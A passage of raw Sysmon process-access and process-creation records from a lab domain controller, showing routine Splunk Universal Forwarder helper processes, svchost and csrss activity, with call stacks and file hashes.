Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-431C-6000-A200-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.838{08A6967A-431C-6000-A200-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:56.086{08A6967A-431B-6000-A100-000000009A01}47084704C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.668{08A6967A-431D-6000-A300-000000009A01}49524968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-431D-6000-A300-000000009A01}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-431D-6000-A300-000000009A01}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.511{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-431D-6000-A300-000000009A01}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:57.512{08A6967A-431D-6000-A300-000000009A01}4952C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-431F-6000-A400-000000009A01}4956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:59.218{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 